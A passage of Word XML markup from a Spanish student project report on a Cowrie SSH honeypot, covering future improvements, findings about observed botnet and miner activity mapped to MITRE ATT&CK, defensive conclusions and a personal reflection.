        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot de alta interacción: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sustituir Cowrie por un sistema que proporcione un Linux real al atacante (mediante contenedores Docker o máquinas virtuales aisladas con snapshots automáticos), permitiendo capturar comportamientos más avanzados como escalada de privilegios, movimiento lateral, instalación de rootkits y comunicación con servidores de comando y control (C2). La configuración de Cowrie con backend proxy hacia una VM real ya lo soporta, aunque requiere un aislamiento riguroso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot multi-protocolo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ampliar la captura a otros servicios frecuentemente atacados: HTTP (ataques a paneles de administración, exploits de aplicaciones web), Telnet (IoT), FTP (credenciales y malware), SMB (ransomware, EternalBlue). Plataformas como T-Pot integran más de 20 honeypots diferentes en un único despliegue con Docker Compose, aunque requieren significativamente más recursos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Red distribuida de honeypots: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">desplegar instancias de Cowrie en múltiples regiones cloud (Europa, América, Asia) para comparar los patrones de ataque por zona geográfica y detectar campañas globales coordinadas. Los datos podrían centralizarse en un único dashboard para su correlación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mejora del Análisis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de malware: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">integrar un sandbox como Cuckoo Sandbox o el servicio cloud de ANY.RUN para analizar automáticamente los binarios descargados por los atacantes, extrayendo indicadores de compromiso (IOC) adicionales: hashes, dominios contactados, claves de registro modificadas y comportamiento en red.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine learning para detección de patrones: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Integración y Automatización</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. El primer ataque llegó 8 minutos después de exponer el puerto 22, y en los tres primeros días se registraron 13 761 conexiones desde 499 IPs. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los datos confirman que la actividad es casi exclusivamente automática: el primer comando llega en menos de un segundo tras la autenticación y el 85 % de los clientes son bibliotecas de programación. Se distinguen perfiles muy diferentes, desde la fuerza bruta masiva y distribuida, que recolecta credenciales sin llegar a usarlas, hasta botnets consolidadas como Outlaw, que buscan persistencia mediante claves SSH, y mineros como RedTail, preparados para cinco arquitecturas de procesador. También se observaron bots que comprueban si se encuentran en un honeypot, un recordatorio de que el defensor también es observado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK identificó 21 técnicas en 9 tácticas, desde el acceso inicial con cuentas válidas (T1078.003) hasta el secuestro de recursos (T1496.001). La mayoría de las sesiones se concentran en las fases tempranas de la cadena de ataque, coherente con bots que buscan acceso rápido para minar criptomonedas o incorporar el servidor a una botnet. La conclusión defensiva más importante es que tres medidas básicas (SSH solo con clave y sin root, control de integridad de authorized_keys y filtrado del tráfico saliente) habrían neutralizado casi toda la actividad observada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con software exclusivamente libre y un coste de infraestructura muy reducido. Un servidor pequeño (2 vCPU y 4 GB de RAM) es más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente. El cambio forzoso de Oracle Cloud a Hetzner Cloud demostró además el valor de automatizar el despliegue con scripts genéricos: cambiar de proveedor solo afectó a la creación de la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La combinación del firewall del proveedor (Cloud Firewall de Hetzner), el firewall del host (iptables) y la redirección NAT proporciona tres capas de protección para el SSH de administración real. El puerto 2022 está expuesto a Internet, pero al aceptar únicamente autenticación por clave y prohibir el acceso como root, los intentos de acceso no autorizados no tienen posibilidad de éxito. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">despliegue de servidores, configuración de cortafuegos del proveedor, gestión de claves SSH y conexión remota en Hetzner Cloud, además del uso de la API de Oracle Cloud Infrastructure para automatizar el aprovisionamiento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables y Cloud Firewall de Hetzner), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripting y automatización: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentación técnica: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">redacción de memoria de proyecto siguiendo estándares académicos, incluyendo diagramas, tablas y referencias bibliográficas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estas competencias son directamente aplicables en roles de administración de sistemas, analista SOC (Security Operations Center) y ciberseguridad en entornos empresariales. El proyecto demuestra capacidad para diseñar, desplegar, operar y documentar un sistema de seguridad completo de forma autónoma, desde la planificación hasta la entrega del informe final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Valoración Personal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La realización de este proyecto ha supuesto un reto formativo significativo que ha ido más allá de la aplicación de conocimientos teóricos. La necesidad de desplegar infraestructura real en la nube, exponer un servicio a Internet y analizar ataques genuinos ha proporcionado una experiencia práctica que difícilmente se obtiene en un entorno académico convencional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El principal aprendizaje ha sido comprobar que la ciberseguridad defensiva no requiere necesariamente herramientas costosas ni infraestructura compleja. Con software libre, un servidor cloud de pocos euros al mes y conocimientos de scripting es posible construir un sistema de inteligencia de amenazas que produce resultados comparables a los de soluciones comerciales. Esta democratización de la ciberseguridad es especialmente relevante para pequeñas organizaciones que no disponen de presupuesto para soluciones enterprise pero que igualmente necesitan comprender las amenazas que enfrentan.</w:t>
      </w:r>
